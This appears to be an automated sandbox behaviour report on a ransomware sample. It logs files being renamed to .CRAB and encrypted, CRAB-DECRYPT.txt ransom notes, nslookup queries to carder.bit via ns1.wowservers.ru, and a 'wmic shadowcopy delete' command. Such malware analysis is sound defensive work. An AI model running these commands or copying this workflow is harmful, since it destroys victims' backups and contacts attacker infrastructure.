File Read filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Access\System.mdw.CRAB, size = 1048576, size_out = 126976 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Access\System.mdw.CRAB, size = 126976 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Access\System.mdw.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Access\System.mdw.CRAB, size = 8 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\AddIns\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\AddIns\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\APASixthEditionOfficeOnline.xsl, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\APASixthEditionOfficeOnline.xsl, destination_filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\APASixthEditionOfficeOnline.xsl.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\APASixthEditionOfficeOnline.xsl.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\APASixthEditionOfficeOnline.xsl.CRAB, size = 1048576, size_out = 333602 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\APASixthEditionOfficeOnline.xsl.CRAB, size = 333616 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\APASixthEditionOfficeOnline.xsl.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\APASixthEditionOfficeOnline.xsl.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\CHICAGO.XSL, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\CHICAGO.XSL, destination_filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\CHICAGO.XSL.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\CHICAGO.XSL.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\CHICAGO.XSL.CRAB, size = 1048576, size_out = 297017 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\CHICAGO.XSL.CRAB, size = 297024 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\CHICAGO.XSL.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\CHICAGO.XSL.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\GB.XSL, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\GB.XSL, destination_filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\GB.XSL.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\GB.XSL.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\GB.XSL.CRAB, size = 1048576, size_out = 268670 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\GB.XSL.CRAB, size = 268672 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\GB.XSL.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\GB.XSL.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\GostName.XSL, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\GostName.XSL, destination_filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\GostName.XSL.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\GostName.XSL.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
For performance reasons, the remaining 4998 entries are omitted.
The remaining entries can be found in glog.xml.
Process #4: nslookup.exe
10 18
»
Information Value
ID #4
File Name c:\windows\syswow64\nslookup.exe
Command Line nslookup carder.bit ns1.wowservers.ru
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:00:42, Reason: Child Process
Unmonitor End Time: 00:05:20, Reason: Terminated by Timeout
Monitor Duration 00:04:38
OS Process Information
»
Information Value
PID 0xb04
Parent PID 0xa44 (c:\users\aetadzjz\appdata\local\temp\qwerty.exe)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs
0x B08
0x B1C
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
private_0x0000000000070000 0x00070000 0x000effff Private Memory Readable, Writable True False False -
pagefile_0x00000000000f0000 0x000f0000 0x000f1fff Pagefile Backed Memory Readable, Writable True False False -
nslookup.exe.mui 0x00100000 0x00104fff Memory Mapped File Readable, Writable False False False -
private_0x0000000000110000 0x00110000 0x00110fff Private Memory Readable, Writable True False False -
private_0x0000000000120000 0x00120000 0x00120fff Private Memory Readable, Writable True False False -
private_0x0000000000130000 0x00130000 0x0016ffff Private Memory Readable, Writable True False False -
private_0x0000000000170000 0x00170000 0x0026ffff Private Memory Readable, Writable True False False -
private_0x0000000000280000 0x00280000 0x002bffff Private Memory Readable, Writable True False False -
locale.nls 0x002c0000 0x00326fff Memory Mapped File Readable False False False -
pagefile_0x0000000000330000 0x00330000 0x004b7fff Pagefile Backed Memory Readable True False False -
private_0x0000000000500000 0x00500000 0x0050ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000510000 0x00510000 0x00690fff Pagefile Backed Memory Readable True False False -
private_0x0000000000760000 0x00760000 0x0079ffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x007a0000 0x00a6efff Memory Mapped File Readable False False False -
private_0x0000000000a70000 0x00a70000 0x00b7ffff Private Memory Readable, Writable True False False -
private_0x0000000000ab0000 0x00ab0000 0x00aeffff Private Memory Readable, Writable True False False -
private_0x0000000000b20000 0x00b20000 0x00b5ffff Private Memory Readable, Writable True False False -
private_0x0000000000b70000 0x00b70000 0x00b7ffff Private Memory Readable, Writable True False False -
nslookup.exe 0x00bc0000 0x00bddfff Memory Mapped File Readable, Writable, Executable True False False -
pagefile_0x0000000000be0000 0x00be0000 0x01fdffff Pagefile Backed Memory Readable True False False -
private_0x0000000001fe0000 0x01fe0000 0x0218ffff Private Memory Readable, Writable True False False -
private_0x0000000001fe0000 0x01fe0000 0x020fffff Private Memory Readable, Writable True False False -
private_0x0000000002180000 0x02180000 0x0218ffff Private Memory Readable, Writable True False False -
private_0x0000000002190000 0x02190000 0x0228ffff Private Memory Readable, Writable True False False -
wsock32.dll 0x743e0000 0x743e6fff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74550000 0x74557fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74560000 0x745bbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x745c0000 0x745fefff Memory Mapped File Readable, Writable, Executable False False False -
fwpuclnt.dll 0x74600000 0x74637fff Memory Mapped File Readable, Writable, Executable False False False -
wship6.dll 0x74640000 0x74645fff Memory Mapped File Readable, Writable, Executable False False False -
wshtcpip.dll 0x74650000 0x74654fff Memory Mapped File Readable, Writable, Executable False False False -
winrnr.dll 0x74660000 0x74667fff Memory Mapped File Readable, Writable, Executable False False False -
mswsock.dll 0x74670000 0x746abfff Memory Mapped File Readable, Writable, Executable False False False -
pnrpnsp.dll 0x746b0000 0x746c1fff Memory Mapped File Readable, Writable, Executable False False False -
napinsp.dll 0x746d0000 0x746dffff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x746e0000 0x746e5fff Memory Mapped File Readable, Writable, Executable False False False -
nlaapi.dll 0x746f0000 0x746fffff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x74a60000 0x74a66fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x74a70000 0x74a8bfff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x74a90000 0x74ad3fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x74c20000 0x74c2bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x74c30000 0x74c8ffff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x74cb0000 0x74dbffff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x74dc0000 0x74eaffff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x75000000 0x750cbfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x750d0000 0x7516ffff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x751d0000 0x75204fff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x75570000 0x7566ffff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75670000 0x756fffff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75750000 0x757affff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757c0000 0x7585cfff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x764f0000 0x7659bfff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76830000 0x76839fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x76840000 0x76885fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x76890000 0x76895fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x768a0000 0x768b8fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000076cd0000 0x76cd0000 0x76deefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000076df0000 0x76df0000 0x76ee9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x76ef0000 0x77098fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x770d0000 0x7724ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Threads
Thread 0xb08
10 18
»
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2018-06-04 08:51:44 (UTC) True 1
Fn
System Get Time type = Ticks, time = 103849 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\nslookup.exe, base_address = 0xbc0000 True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Close type = SOCK_DGRAM True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DNSLookupOrder False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = Domain True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DhcpDomain False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DNSClient False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = SearchList True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DhcpSearchList False 1
Fn
DNS Get Hostname name_out = YKyd69q True 1
Fn
DNS Resolve Name host = ns1.wowservers.ru, address_out = 190.35.242.126, 197.254.118.42, 221.120.220.72, 81.4.163.122 True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 190.35.242.126, remote_port = 53 False 1
Fn
Socket Send flags = NO_FLAG_SET, size = 45, size_out = 45 True 1
Fn
Data
Socket Close type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 190.35.242.126, remote_port = 53 False 1
Fn
Socket Send flags = NO_FLAG_SET, size = 28, size_out = 28 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 188 True 1
Fn
Data
Socket Close type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 190.35.242.126, remote_port = 53 False 1
Fn
Socket Send flags = NO_FLAG_SET, size = 28, size_out = 28 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 698 True 1
Fn
Data
Socket Close type = SOCK_DGRAM True 1
Fn
Process #5: nslookup.exe
10 18
»
Information Value
ID #5
File Name c:\windows\syswow64\nslookup.exe
Command Line nslookup carder.bit ns1.wowservers.ru
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:01:23, Reason: Child Process
Unmonitor End Time: 00:05:20, Reason: Terminated by Timeout
Monitor Duration 00:03:57
OS Process Information
»
Information Value
PID 0xbc4
Parent PID 0xa44 (c:\users\aetadzjz\appdata\local\temp\qwerty.exe)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs
0x BC8
0x BF0
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
locale.nls 0x00070000 0x000d6fff Memory Mapped File Readable False False False -
pagefile_0x00000000000e0000 0x000e0000 0x000e1fff Pagefile Backed Memory Readable, Writable True False False -
nslookup.exe.mui 0x000f0000 0x000f4fff Memory Mapped File Readable, Writable False False False -
private_0x0000000000100000 0x00100000 0x00100fff Private Memory Readable, Writable True False False -
private_0x0000000000110000 0x00110000 0x0014ffff Private Memory Readable, Writable True False False -
private_0x0000000000150000 0x00150000 0x00150fff Private Memory Readable, Writable True False False -
private_0x0000000000160000 0x00160000 0x0019ffff Private Memory Readable, Writable True False False -
private_0x00000000001a0000 0x001a0000 0x0021ffff Private Memory Readable, Writable True False False -
private_0x0000000000230000 0x00230000 0x0026ffff Private Memory Readable, Writable True False False -
private_0x00000000002c0000 0x002c0000 0x003bffff Private Memory Readable, Writable True False False -
private_0x00000000003c0000 0x003c0000 0x0049ffff Private Memory Readable, Writable True False False -
private_0x00000000004d0000 0x004d0000 0x004dffff Private Memory Readable, Writable True False False -
pagefile_0x00000000004e0000 0x004e0000 0x00667fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000670000 0x00670000 0x007f0fff Pagefile Backed Memory Readable True False False -
private_0x0000000000800000 0x00800000 0x0091ffff Private Memory Readable, Writable True False False -
private_0x00000000008c0000 0x008c0000 0x008fffff Private Memory Readable, Writable True False False -
private_0x0000000000910000 0x00910000 0x0091ffff Private Memory Readable, Writable True False False -
private_0x0000000000930000 0x00930000 0x0096ffff Private Memory Readable, Writable True False False -
private_0x0000000000970000 0x00970000 0x00adffff Private Memory Readable, Writable True False False -
private_0x0000000000970000 0x00970000 0x00a6ffff Private Memory Readable, Writable True False False -
private_0x0000000000aa0000 0x00aa0000 0x00adffff Private Memory Readable, Writable True False False -
nslookup.exe 0x00b10000 0x00b2dfff Memory Mapped File Readable, Writable, Executable True False False -
pagefile_0x0000000000b30000 0x00b30000 0x01f2ffff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x01f30000 0x021fefff Memory Mapped File Readable False False False -
wsock32.dll 0x743e0000 0x743e6fff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74550000 0x74557fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74560000 0x745bbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x745c0000 0x745fefff Memory Mapped File Readable, Writable, Executable False False False -
fwpuclnt.dll 0x74600000 0x74637fff Memory Mapped File Readable, Writable, Executable False False False -
wship6.dll 0x74640000 0x74645fff Memory Mapped File Readable, Writable, Executable False False False -
wshtcpip.dll 0x74650000 0x74654fff Memory Mapped File Readable, Writable, Executable False False False -
winrnr.dll 0x74660000 0x74667fff Memory Mapped File Readable, Writable, Executable False False False -
mswsock.dll 0x74670000 0x746abfff Memory Mapped File Readable, Writable, Executable False False False -
pnrpnsp.dll 0x746b0000 0x746c1fff Memory Mapped File Readable, Writable, Executable False False False -
napinsp.dll 0x746d0000 0x746dffff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x746e0000 0x746e5fff Memory Mapped File Readable, Writable, Executable False False False -
nlaapi.dll 0x746f0000 0x746fffff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x74a60000 0x74a66fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x74a70000 0x74a8bfff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x74a90000 0x74ad3fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x74c20000 0x74c2bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x74c30000 0x74c8ffff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x74cb0000 0x74dbffff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x74dc0000 0x74eaffff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x75000000 0x750cbfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x750d0000 0x7516ffff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x751d0000 0x75204fff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x75570000 0x7566ffff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75670000 0x756fffff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75750000 0x757affff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757c0000 0x7585cfff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x764f0000 0x7659bfff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76830000 0x76839fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x76840000 0x76885fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x76890000 0x76895fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x768a0000 0x768b8fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000076cd0000 0x76cd0000 0x76deefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000076df0000 0x76df0000 0x76ee9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x76ef0000 0x77098fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x770d0000 0x7724ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Threads
Thread 0xbc8
10 18
»
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2018-06-04 08:52:25 (UTC) True 1
Fn
System Get Time type = Ticks, time = 145314 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\nslookup.exe, base_address = 0xb10000 True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Close type = SOCK_DGRAM True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DNSLookupOrder False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = Domain True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DhcpDomain False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DNSClient False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = SearchList True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DhcpSearchList False 1
Fn
DNS Get Hostname name_out = YKyd69q True 1
Fn
DNS Resolve Name host = ns1.wowservers.ru, address_out = 190.35.242.126, 197.254.118.42, 221.120.220.72, 81.4.163.122 True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 190.35.242.126, remote_port = 53 False 1
Fn
Socket Send flags = NO_FLAG_SET, size = 45, size_out = 45 True 1
Fn
Data
Socket Close type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 190.35.242.126, remote_port = 53 False 1
Fn
Socket Send flags = NO_FLAG_SET, size = 28, size_out = 28 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 188 True 1
Fn
Data
Socket Close type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 190.35.242.126, remote_port = 53 False 1
Fn
Socket Send flags = NO_FLAG_SET, size = 28, size_out = 28 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 698 True 1
Fn
Data
Socket Close type = SOCK_DGRAM True 1
Fn
Process #6: wmic.exe
21 0
»
Information Value
ID #6
File Name c:\windows\syswow64\wbem\wmic.exe
Command Line "C:\Windows\system32\wbem\wmic.exe" shadowcopy delete
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:01:29, Reason: Child Process
Unmonitor End Time: 00:05:20, Reason: Terminated by Timeout
Monitor Duration 00:03:51
OS Process Information
»
Information Value
PID 0x894
